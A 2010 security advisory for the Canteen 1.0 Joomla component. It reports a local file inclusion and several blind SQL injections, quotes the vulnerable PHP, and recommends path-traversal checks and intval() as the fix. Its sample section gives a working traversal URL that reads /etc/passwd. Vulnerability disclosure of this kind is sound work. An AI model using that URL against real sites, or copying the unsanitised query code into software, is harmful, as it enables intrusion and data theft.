Canteen Joomla Component 1.0 Multiple Remote Vulnerabilities Name Canteen Vendor http://www.miniwork.eu Versions Affected 1.0 Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date 2010-04-07 X. INDEX I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX I. ABOUT THE APPLICATION Canteen is a Joomla 1.5 component. This component is written for canteens. You can easily manage daily menu with this component. II. DESCRIPTION Some parameters are not sanitised before being used in SQL queries and in danger PHP's functions. III. ANALYSIS Summary: A) Local File Inclusion B) Multiple Blind SQL Injection A) Local File Inclusion The controller parameter in canteen.php is not sanitised before being used in the PHP function's require_once(). This allows a guest to include local files. The following is the affected code: if($controller = JRequest::getVar('controller')) { require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php'); } B) Multiple Blind SQL Injection The meailid parameter in menu.php is not properly before being used in multiple SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The following is the affected code: $mealid = JRequest::getVar('mealid'); $SQLQuery = "INSERT INTO #__miniwork_canteen_order (jo_userid, jo_mealid, jo_created, jo_createdby, jo_changed, jo_changedby) VALUES (".$user->id.", ".$mealid.", NOW(), '".$user->sSecondName." ".$user->sFirstName."', NOW(), '".$user->sSecondName." ".$user->sFirstName."')"; $mealid = JRequest::getVar('mealid'); $SQLQuery = "DELETE FROM #__miniwork_canteen_order WHERE jo_mealid = ".$mealid." AND jo_userid = ".$orduser->id.";"; $mealid = JRequest::getVar('mealid'); $SQLQuery = "UPDATE #__miniwork_canteen_order SET jo_userid = ".$orduser->id.", jo_changed=NOW(), jo_changedby='".$orduser->sSecondName." ".$orduser->sFirstName."' WHERE jo_mealid=".$mealid." AND jo_userid is null LIMIT 1;"; IV. SAMPLE CODE A) Local File Inclusion http://site/path/index.php?option=com_canteen&controller=../../../../../ etc/passwd%00 V. FIX Checking for path traversal sequence and useing of PHP function's intval() for integer values.